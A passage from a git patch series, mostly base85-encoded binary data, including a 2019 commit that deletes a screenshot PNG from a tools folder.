zjzbwqfzvQ8|aq`8`g|E>T@cu@{rIP%puq@?K^gqe z)ytsbu;Z{hQc<$hkH9PBD7AOs|9qQvMH)`Kks+c1p;K}nc$ZNCti*%P{ZC03c>izL z1plU`T;T72Ze4$spwV5-544-+p)ogGNYn4H{K-ak2p#k`bnFHDF$2Vp`x~szy!oCV z?)`xz|BN|;U;oc10r5zmu_%VrBlTC2%4j#$n$vuKME6{~$K+DhY`qr0u$v1gYcBLY z{TASmQU6R);QIf4q0x9NjH^YMSD7WRG&^Q%{&f=oV88SKYcCP`3&SU^pcr*1QSR1ta9cMm(Ejx_KgS860~~*vFC-TMw`^^D z%Vb^X6E_63ni?Gcdp!M@*Zl9AD{b!kT0+}dvz-oY>d_>i+WoeB>EU|+X=%NdPqjv| zNU?YeF=0RAIvpTTb^kYNton*It4?3fDs`ZKy7?9CdcutT9|!jzE=eQRpXzqzBJcpX zPP~J3yOmaq_%C4d5!mS86)3@oZ^6N4aReChx-1X=#LF-BuP%_XpDz%`=Gd8V^FiD z=BhQ^vSI}3yI}js*-d;u*k=)_cN&vH(RBnHjD~l%Z-p#r(}e+*I9To@MzLlRA9Cg7 zeu&D5vEN7ZIGbr@UE+0eoH29mlS4BR?Dg1ZrzAGS^qA}@es>dydAR<6J@WtRnEzcT z`3K8@;vAz6*hO{7u1RX8Ux-T>jN5)+L&eIV1lK53lqxoRFYP}(0UiKxHm?+H3!WMi z*H9`_uhvYKybGW6Ba%H!yt_h|9K}Q64S)=AeXmgb{{<0(Acfw2^{Gz-T&;MP=u{_i&-{r4T~hXeoH z2=JdOP&K{nFzizcP?5&eNuG&L&)H8+V3XbzU7>#IoDb6kRY_Nh4Hx`U7YI;vhyN+) z|0h8IKeneI6y(PV{=abB|5SGWPzVR%_u<`1CVg+4&WXoepg03`&Gt*ibM{v8~liiLF&n%aPA}psEQ-wghJEtEXK>t-m~BS6Cc)#k5~?K1$fip_&0n zx4O!<790?ucsGwN(Anke*Q?MEV2|sXXspf$nFaQKZQmnqdkvN8J*^Qhk3ylu#l;s( zTfA($mcS0PO5oz4z|z*=A9D%p4qSE?JnepNi0CF{*7zmQv|+Iez1amyCTH#_pqyr` zE;W9n_vFwpj}HpDJo~Iw__R>z#bgiN7TT;)$g9^q2Z#pYVPRo>ci;aWzur$+tW)t8 zB*Zu>2bq9L(ono+G+P zA`$rjy_LR9rcBuQZwcZy*K{4I)pIJNC32`NIAKrlq91*8)6AL@3bcvA!Nr`JZHSZh zKgnM|8VHZWt@`7>fCsKS)SNb_d$5SdV|33MV?%s#PUFfp1>-sX z>5#)V9L+6z7Ukf*9yK>kVqLo*AVq$p+0}hu=j7QB^H#xj)v3kBu3e)60Rb;r;ojGR zhrm|Y;MtpvV0T}Ugwf!!5YY{@X0NVy`hj*>%1!O9&*)M?F zv5AO&uz`4_sGWgUww|`zOHQ(y{pvV^8G$r;ZEUX=1wX$<{>^>$at{S!myHU zXuB^X-)ua8&ooFnK~h(~Ore;89oJCR5LK%g>|YI@u9^5%GFDe4$+5v#suJHJDVAEfASE`t{IsXFJvMcA z+hA)LqmVcIbR3n*+M^kKOexvgpf7gTrUI2oliv|I*xUQGl!udn=R&nNIyZiX4iOz4 z?fMi`2cz8Ohn`y!D~eld0?%Qsdv@%Cx`sx6EjBJLPS2&sRBS3K*r5}FJZwp?VHO+G zI;!K)M@EO_crPDb8{RIp&3S7X6th_=xAu86ON^o?ngdy*4>G#9w-;!s($I&hoo^%SXTF7u4Es6BRlGSRVXqG`=q zRyJ9;C%>{)u5;o;21qtRx#BZ;vg*pJC)iFrXvVp$eLyR7_ReBaN=o^|etUOW4byG5 zt Date: Sun, 17 Mar 2019 20:36:26 +0100 Subject: [PATCH 034/214] Delete screenshot2.png --- tools/screenshot2.png | Bin 93365 -> 0 bytes 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 tools/screenshot2.png diff --git a/tools/screenshot2.png b/tools/screenshot2.png deleted file mode 100644 index d1114bc0cc4822c6155d411ffa920838bfebb1dd..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 93365 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 